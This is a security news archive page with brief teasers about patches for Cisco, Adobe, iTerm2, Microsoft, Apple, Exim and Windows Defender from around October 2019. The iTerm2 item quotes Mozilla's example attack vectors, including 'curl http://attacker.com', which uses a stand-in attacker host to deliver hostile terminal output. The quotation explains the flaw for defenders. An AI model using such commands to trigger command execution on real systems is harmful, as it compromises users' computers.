Category Archives: security update

Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points

Cisco has released another batch of security updates, the most critical of which fixes a vulnerability that could allow unauthenticated, remote attackers to gain access to vulnerable Cisco Aironet wireless access points. Cisco Aironet APs are enterprise-grade access points used for branch offices, campuses, organizations of all sizes, enterprise and carrier-operator Wi-Fi deployments, and so on. Cisco Aironet vulnerabilities During the resolution of a Cisco TAC support case, the company’s technicians discovered a number of … More

The post Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points appeared first on Help Net Security.

Adobe splats bucketful of bugs in Acrobat and Reader

If you thought that Adobe skipped this month’s Patch Tuesday because there were no immediate vulnerabilities to fix, you were wrong: a week later the company dropped security updates for several of its products, including Acrobat and Reader and the Download Manager. All in all, 82 security holes – most of which are critical – have been plugged. The good news is that none are under active exploitation. The updates The update for Adobe Acrobat … More

The post Adobe splats bucketful of bugs in Acrobat and Reader appeared first on Help Net Security.

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe

As predicted by Ivanti’s Chris Goettl, October 2019 Patch Tuesday came with a relatively small number of Microsoft updates and, curiously enough, with no security updates from Adobe. There is no report of any of the Microsoft bugs being exploited, but there is public PoC code for and info about a local privilege escalation flaw in Windows Error Reporting (CVE-2019-1315). Microsoft’s patches Microsoft has addressed nearly 60 vulnerabilities, nine of which are critical. Seven of … More

The post October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe appeared first on Help Net Security.

macOS Catalina: Security and privacy improvements

Apple has released macOS Catalina (v10.15), a new major release of its desktop operating system, which comes with many functional and security and privacy improvements. The former include a new game subscription service, a feature that extends Mac desktops with iPad as a second display, a new accessibility feature that makes it possible to control Mac entirely by voice, and more. The latter include, among other things, better protections against macOS tampering, an improved Gatekeeper, … More

The post macOS Catalina: Security and privacy improvements appeared first on Help Net Security.

Cisco closes high-impact vulnerabilities in its security offerings

Cisco has fixed 18 high-impact vulnerabilities affecting several of its security offerings and is advising administrators to test and implement the offered security updates as soon as possible. “Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access, gain elevated privileges, execute arbitrary commands, or cause a denial of service (DoS) condition on an affected device,” the company said. About the vulnerabilities The vulnerabilities affect Cisco ASA (Adaptive Security Appliance) Software, Cisco … More

The post Cisco closes high-impact vulnerabilities in its security offerings appeared first on Help Net Security.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

Microsoft will continue providing Windows 7 security updates for SMBs

According to the latest Alert Logic’s research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course. Details about the ESU offer Windows is the most popular desktop operating system … More

The post Microsoft will continue providing Windows 7 security updates for SMBs appeared first on Help Net Security.

Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which has been released on Sunday. About Exim and the flaw (CVE-2019-16928) According to E-Soft, Exim is the most widely used … More

The post Guess what? You should patch Exim again! appeared first on Help Net Security.

Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable systems. The Internet Explorer vulnerability (CVE-2019-1367) CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights … More

The post Microsoft drops emergency Internet Explorer fix for actively exploited zero-day appeared first on Help Net Security.

A bug made some Windows Defender antivirus scans fail

Microsoft has released a fix for a bug that made its Windows Defender Antivirus fail after a few seconds when users opted for a Quick or Full scan of the system. Users are advised to implement security intelligence update (virus definitions) v1.301.1684.0 or later to get the software back on track. Bundled antivirus protection Windows Defender Antivirus is an anti-malware component of Microsoft Windows 10 – in essence, free antivirus software. The software used to … More

The post A bug made some Windows Defender antivirus scans fail appeared first on Help Net Security.